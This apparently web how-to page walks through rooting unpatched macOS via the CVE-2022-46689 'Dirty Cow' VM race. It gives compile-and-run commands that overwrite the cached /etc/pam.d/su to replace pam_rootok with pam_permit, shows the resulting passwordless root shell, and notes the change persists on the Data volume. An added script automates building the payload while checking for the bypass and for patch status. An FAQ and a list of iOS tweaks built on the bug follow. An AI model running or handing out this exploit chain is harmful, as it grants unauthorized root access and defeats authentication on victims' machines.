Using the test case from Apple's XNU source, get root access on macOS 13.0.1 via the Dirty Cow bug (CVE-2022-46689): a race in the kernel's VM code that lets an unprivileged process modify read-only file mappings.
How to Root macOS
On a Mac running macOS 13.0.1, 12.6.1 or earlier, fetch the extracted test case (MacDirtyCowDemo on GitHub) and run the commands below. The sed step builds a copy of /etc/pam.d/su in which pam_rootok.so is replaced by pam_permit.so; switcharoo then races the kernel into writing that copy over the read-only mapping of the real file, after which su no longer asks for a password.
clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su
You should see output like this:
% ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
RO mapping was modified
% su
sh-3.2#
Tested on macOS 13 beta (22A5266r) with SIP disabled. SIP should not matter here: /etc/pam.d/su is not an SIP-protected path (root can edit it normally), and the bug is what lets an unprivileged user do the same.
If your copy of macOS has been patched correctly (13.1 or 12.6.2), the output should instead read:
$ ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure
and su should continue to ask for a password.
Because the system volume is sealed and read-only, running this on a file under /System only changes the cached copy of the file in memory; the change disappears on reboot. On a writable volume (such as the Data volume, where /etc/pam.d lives) the modification survives a reboot.
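The steps above, with the checks a practitioner would want around them, as an added example (not code from the MacDirtyCowDemo repository or from Apple's test case). It wraps payload creation, a post-overwrite check and the page's patched-version list in shell functions and runs them on a constructed copy of /etc/pam.d/su in a temporary directory, so it runs on any POSIX system without touching the real file or needing the switcharoo binary. The stock file contents in the heredoc are assumed, and the version boundaries are the ones the page lists.

```shell
#!/bin/sh
# Added example, not code from the MacDirtyCowDemo repository or from Apple's
# test case. The stock /etc/pam.d/su contents further down are assumed.

# Step 1: build overwrite_file.bin exactly as the page does (rootok -> permit),
# with one check the page leaves implicit: the race rewrites bytes of the
# target that are already in the page cache, it cannot change the file's
# size. A payload whose length differs from the original will not line up
# with the original contents, so refuse it. "pam_rootok.so" and
# "pam_permit.so" are both 13 bytes, which is why the page's sed works.
make_pam_payload() {
    src=$1; out=$2
    sed -e 's/rootok/permit/g' "$src" > "$out" || return 1
    src_len=$(wc -c < "$src" | tr -d ' ')
    out_len=$(wc -c < "$out" | tr -d ' ')
    if [ "$src_len" -ne "$out_len" ]; then
        echo "refusing payload: $out_len bytes vs original $src_len" >&2
        return 1
    fi
    if cmp -s "$src" "$out"; then
        echo "payload is identical to the original (nothing to overwrite)" >&2
        return 1
    fi
    return 0
}

# Step 3: once ./switcharoo prints "RO mapping was modified", the auth stack
# PAM sees is whatever is now in the page cache. Flag any
# "auth sufficient pam_permit.so" line: that is the password bypass the
# overwrite produces and the line an incident responder should grep for.
# Prints matching lines; returns 1 if any were found, 0 if the file is clean.
pam_bypass_lines() {
    hits=$(grep -E '^[[:space:]]*auth[[:space:]]+sufficient[[:space:]]+pam_permit\.so' "$1" || true)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Is this macOS version at or past the fix the page names
# (13.1 / 12.6.2 / 11.7.2)? Returns 0 if fixed (anything newer than 13 counts
# as fixed), 1 if in the affected range, 2 if older than 11 (not covered here).
macos_patched() {
    v=$1
    major=${v%%.*}; rest=${v#"$major"}; rest=${rest#.}
    minor=${rest%%.*}; rest=${rest#"$minor"}; rest=${rest#.}
    patch=${rest%%.*}
    [ -n "$minor" ] || minor=0
    [ -n "$patch" ] || patch=0
    case "$major" in
        13) fix_minor=1; fix_patch=0 ;;
        12) fix_minor=6; fix_patch=2 ;;
        11) fix_minor=7; fix_patch=2 ;;
        *) [ "$major" -gt 13 ] && return 0; return 2 ;;
    esac
    [ "$minor" -gt "$fix_minor" ] && return 0
    [ "$minor" -eq "$fix_minor" ] && [ "$patch" -ge "$fix_patch" ] && return 0
    return 1
}

# Demo on a constructed copy of the stock /etc/pam.d/su (assumed contents).
work=$(mktemp -d)
cat > "$work/su" <<'EOF'
# su: auth account password session
auth       sufficient     pam_rootok.so
auth       required       pam_opendirectory.so
account    required       pam_group.so no_warn group=admin,wheel ruser root_only fail_safe
account    required       pam_opendirectory.so no_check_shell
password   required       pam_opendirectory.so
session    required       pam_launchd.so
EOF
if make_pam_payload "$work/su" "$work/overwrite_file.bin"; then
    echo "payload ready: $work/overwrite_file.bin"
    # On a vulnerable Mac the next two steps are the page's own:
    #   ./switcharoo /etc/pam.d/su overwrite_file.bin && su
    echo "auth line the kernel would serve after a successful overwrite:"
    pam_bypass_lines "$work/overwrite_file.bin" || echo "(bypass present: su would not ask for a password)"
fi
ver=$(sw_vers -productVersion 2>/dev/null || echo 13.0.1)   # sample version when not on macOS
if macos_patched "$ver"; then echo "macOS $ver: fix present"; else echo "macOS $ver: affected or not covered"; fi
rm -rf "$work"
```

Run it as an ordinary user; nothing in it needs root. On a real machine, point pam_bypass_lines at /etc/pam.d/su (and the other files in /etc/pam.d) after the race to confirm what PAM will actually evaluate, since the on-disk and cached contents can differ until the next reboot on a sealed volume.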
Can my Mac be vulnerable to the Dirty Cow bug (dirty copy-on-write bug)?
You are fine if you have installed the latest macOS update (13.1 / 12.6.2 / 11.7.2). If not, update now.
Will the Dirty Cow bug result in a jailbreak for iOS?
The bug lives in the XNU kernel's VM code, but what the public test case gives a userspace process is the ability to rewrite the cached contents of files it can only read. That is not kernel code execution, and a jailbreak needs a kernel exploit. Apple's security notes say the issue may allow arbitrary code execution with kernel privileges, but the public demo does not show how, and we cannot confirm it. The safer assumption is that no jailbreak will come out of Dirty Cow alone; others may see it differently.
Jailbreak developers may still build something useful for iOS with the bug, though it is unclear what they will overwrite, since code signing should still protect every executable and library from being replaced. Let us know what you find.
Tweaks built on the Dirty Cow primitive already exist. Here are a few popular ones.
DirtyCow Tweak Apps for iOS (iPhone / iPad; sideload with any method you like)
- Disable camera shutter sound – NoCameraSound
- Change fonts – WDBFontOverwrite
- Custom lock faces for TrollLock Reborn
- Santander – file manager
- CCEnabler
- Home Bar Hide – NoHomeBar
- DockTransparent
- FileSwitcherX
- DirtyCowApp
- Cowabunga
- InstaSpring
- TrollLock 1.0
- AirDropIconChanger
- DynamicCow
Dirty Cow tweaks can also be installed online directly, with no PC required.
Credits
Project Zero’s Ian Beer for identifying the problem. Looking forward to reading your writeup!
Apple, for the test case. (I didn't change anything: I just added the command line parameter to control what to overwrite.)
SSLab@Gatech, for the /etc/pam.d trick that turns off password checking.